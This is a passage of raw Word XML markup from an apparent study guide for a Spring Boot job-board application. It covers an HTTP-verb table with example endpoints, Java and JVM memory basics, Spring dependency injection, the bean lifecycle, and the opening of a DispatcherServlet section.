            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Verb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Semantic Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idempotent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GlobalCo Example Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expected Status Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Retrieve resource(s) without modifying server state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Create a new resource or execute a non-idempotent action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/jobs/{id}/apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Replace or completely update an existing resource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Partially update specific fields of a resource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PATCH /api/recruiter/applications/{id}/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Remove a specific resource from the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DELETE /api/saved-jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / 204 No Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Java 21 LTS &amp; The Java Virtual Machine (JVM) Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Java: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Java is a statically-typed, object-oriented programming language designed for platform independence via the 'Write Once, Run Anywhere' (WORA) philosophy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Compilation to Bytecode: When you run 'mvn compile', Java source code (.java files) is compiled by javac into platform-neutral bytecode (.class files), rather than native machine instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Java Virtual Machine (JVM): The JVM loads, verifies, and executes bytecode. It abstracts away operating system differences (Windows vs Linux vs macOS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Just-In-Time (JIT) Compiler: The JVM's HotSpot execution engine monitors bytecode execution in real-time. Code paths executed repeatedly ('hot spots') are dynamically compiled into native x86_64 machine code, achieving near C++ performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Automated Garbage Collection (GC): Developers do not manually allocate or free memory (unlike C/C++ malloc/free). The JVM's garbage collector automatically tracks object references and frees unreferenced memory on the Heap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.1 JVM Memory Architecture (Heap, Stack, Metaspace)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Stack Memory: Allocated per thread. Stores local primitive variables and references to objects. Stack frames are created when a method is called and popped when the method returns (LIFO order). High speed, fixed size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Heap Memory: Shared across all threads. All Java objects and JPA entities (e.g., Job, User, Application) reside on the Heap. Managed dynamically by the Garbage Collector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Metaspace: Native memory region storing class metadata, method bytecode, runtime constant pools, and static variables. Replaced the legacy PermGen in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Spring Framework &amp; Spring Boot Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">The Core Problem: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In traditional programming, an object instantiates its own dependencies using the 'new' keyword (e.g., JobService creates new JobRepository()). This tightly couples classes, making unit testing and swapping implementations impossible. Spring solves this through Inversion of Control (IoC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC): Control of object creation, configuration, and lifecycle is inverted from the application code to the framework container (the Spring ApplicationContext).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Dependency Injection (DI): The pattern where the IoC container injects dependent objects into a class (via constructor injection or @Autowired field injection) rather than the class creating them itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring Beans: Any object managed, configured, and instantiated by the Spring IoC container. Annotated with stereotypes: @Component, @Service, @Repository, or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.1 Complete Spring Bean Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: Spring Framework Bean Lifecycle from Startup to Shutdown</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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[SPRING BEAN LIFECYCLE PHASES]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Bean Definition Loading: Spring scans @ComponentScan packages for annotations.</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2. Instantiation: Spring invokes the Bean constructor using reflection.</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3. Populate Properties: Injects @Autowired dependencies and @Value configurations.</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4. BeanNameAware / BeanFactoryAware: Informs bean of its identifier and owning container.</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5. BeanPostProcessor (Pre-Initialization): Custom modification before initialization.</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6. @PostConstruct / InitializingBean: Executes custom startup logic (e.g., DataInitializer).</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7. BeanPostProcessor (Post-Initialization): Dynamic Proxy generation (e.g., @Transactional proxies).</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8. BEAN READY FOR USE: Serves client requests inside controllers and services.</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9. PreDestroy / DisposableBean: Container shutdown; releases thread pools and database connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.2 Spring MVC &amp; The DispatcherServlet Request Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>When an HTTP request enters the Spring Boot application, it is orchestrated through the front controller pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: Spring MVC DispatcherServlet Internal Execution Pipeline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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
